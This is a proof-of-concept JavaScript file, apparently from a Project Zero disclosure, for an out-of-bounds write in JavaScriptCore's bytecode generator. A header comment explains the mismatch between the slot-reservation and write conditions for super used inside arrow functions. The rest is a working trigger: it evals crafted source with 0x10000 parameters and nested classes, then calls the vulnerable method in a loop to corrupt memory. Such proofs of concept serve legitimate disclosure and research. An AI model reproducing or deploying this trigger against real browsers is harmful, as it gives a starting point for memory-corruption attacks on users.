
/*
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1173
|
|
|
|
When a `super` expression is used inside an arrow function, the bytecode generator runs the following code for the enclosing non-arrow function (note the `!codeBlock->isArrowFunction()` guard):
|
|
|
|
if (needsToUpdateArrowFunctionContext() && !codeBlock->isArrowFunction()) {
|
|
bool canReuseLexicalEnvironment = isSimpleParameterList;
|
|
initializeArrowFunctionContextScopeIfNeeded(functionSymbolTable, canReuseLexicalEnvironment);
|
|
emitPutThisToArrowFunctionContextScope();
|
|
emitPutNewTargetToArrowFunctionContextScope();
|
|
emitPutDerivedConstructorToArrowFunctionContextScope();
|
|
}
|
|
|
|
Here's |emitPutDerivedConstructorToArrowFunctionContextScope|.
|
|
|
|
void BytecodeGenerator::emitPutDerivedConstructorToArrowFunctionContextScope()
|
|
{
|
|
if ((isConstructor() && constructorKind() == ConstructorKind::Extends) || m_codeBlock->isClassContext()) {
|
|
if (isSuperUsedInInnerArrowFunction()) {
|
|
ASSERT(m_arrowFunctionContextLexicalEnvironmentRegister);
|
|
|
|
Variable protoScope = variable(propertyNames().builtinNames().derivedConstructorPrivateName());
|
|
emitPutToScope(m_arrowFunctionContextLexicalEnvironmentRegister, protoScope, &m_calleeRegister, DoNotThrowIfNotFound, InitializationMode::Initialization);
|
|
}
|
|
}
|
|
}
|
|
|
|
|emitPutToScope| is called directly, without resolving the scope first. This means the scope held in |m_arrowFunctionContextLexicalEnvironmentRegister| must already contain a slot for |derivedConstructorPrivateName|; that slot is reserved in the following method.
|
|
|
|
void BytecodeGenerator::initializeArrowFunctionContextScopeIfNeeded(SymbolTable* functionSymbolTable, bool canReuseLexicalEnvironment)
|
|
{
|
|
ASSERT(!m_arrowFunctionContextLexicalEnvironmentRegister);
|
|
|
|
if (canReuseLexicalEnvironment && m_lexicalEnvironmentRegister) {
|
|
...
|
|
if (isConstructor() && constructorKind() == ConstructorKind::Extends && isSuperUsedInInnerArrowFunction()) {
|
|
offset = functionSymbolTable->takeNextScopeOffset(NoLockingNecessary);
|
|
functionSymbolTable->set(NoLockingNecessary, propertyNames().builtinNames().derivedConstructorPrivateName().impl(), SymbolTableEntry(VarOffset(offset)));
|
|
}
|
|
...
|
|
}
|
|
...
|
|
}
|
|
|
|
But the problem is that the checks in |emitPutDerivedConstructorToArrowFunctionContextScope| and |initializeArrowFunctionContextScopeIfNeeded| are slightly different: the reservation is gated on one condition, the write on a broader one.
|
|
|
|
BytecodeGenerator::initializeArrowFunctionContextScopeIfNeeded:
|
|
if (isConstructor() && constructorKind() == ConstructorKind::Extends && isSuperUsedInInnerArrowFunction())
|
|
|
|
BytecodeGenerator::emitPutDerivedConstructorToArrowFunctionContextScope:
|
|
if ((isConstructor() && constructorKind() == ConstructorKind::Extends) || m_codeBlock->isClassContext()) {
|
|
if (isSuperUsedInInnerArrowFunction()) {
|
|
|
|
Note the extra " || m_codeBlock->isClassContext()" disjunct: an ordinary method of a class satisfies it, but a non-constructor never satisfies the |isConstructor() && constructorKind() == ConstructorKind::Extends| condition that reserves the slot.
|
|
|
|
So for a class method that is not a derived-class constructor but uses |super| in an inner arrow function, no slot is reserved for |derivedConstructorPrivateName|, yet |emitPutToScope| is still emitted against |m_arrowFunctionContextLexicalEnvironmentRegister|, which results in an out-of-bounds write into that arrow-function context scope.
|
|
|
|
PoC:
|
|
*/
|
|
|
|
// PoC for the JSC bytecode-generator mismatch described above (Project Zero
// issue 1173): emitPutDerivedConstructorToArrowFunctionContextScope emits a
// put for the |derivedConstructorPrivateName| slot that
// initializeArrowFunctionContextScopeIfNeeded never reserved. The script only
// builds JavaScript source text and eval()s it; the bug is hit when JSC
// compiles and runs that source.

// Build a comma-separated list of 0x10000 distinct parameter names
// ("a0, a1, ..."). NOTE(review): the large count presumably makes the scope
// offset reserved by the outer derived constructor large, so the unreserved
// write performed by the nested method lands far outside its own scope —
// confirm against the generator code quoted above.
let args = new Array(0x10000);
// new Array(n) is sparse and Array.prototype.map skips holes; fill() turns
// the holes into real (undefined) elements so the map callback runs for
// every index.
args.fill();
args = args.map((_, i) => 'a' + i).join(', ');

// Structure of the eval'd source:
//  - class B extends A has a constructor with all 0x10000 parameters and an
//    arrow function that references every parameter and calls super(). This
//    matches the branch quoted above that reserves the slot
//    (isConstructor() && Extends && isSuperUsedInInnerArrowFunction()).
//    The arrow is never invoked; only its presence in the source matters.
//  - Nested inside that constructor, class C has a method trigger() whose
//    inner arrow function uses super.x. trigger() is a class context
//    (isClassContext()) but not a constructor, so the put is emitted although
//    no slot was reserved for it.
//  - B's constructor returns a C instance; returning an object from a derived
//    constructor is allowed even though super() was never actually called.
let gun = eval(`(function () {
  class A {

  }

  class B extends A {
    constructor(${args}) {
      () => {
        ${args};
        super();
      };

      class C {
        constructor() {
        }

        trigger() {
          (() => {
            super.x;
          })();
        }
      }

      return new C();
    }
  }

  return new B();
})()`);

// Call the vulnerable method repeatedly. Each call executes the emitted
// put-to-scope, so the out-of-bounds write presumably repeats per call until
// the corruption becomes observable (e.g. as a crash).
for (let i = 0; i < 0x10000; i++)
  gun.trigger();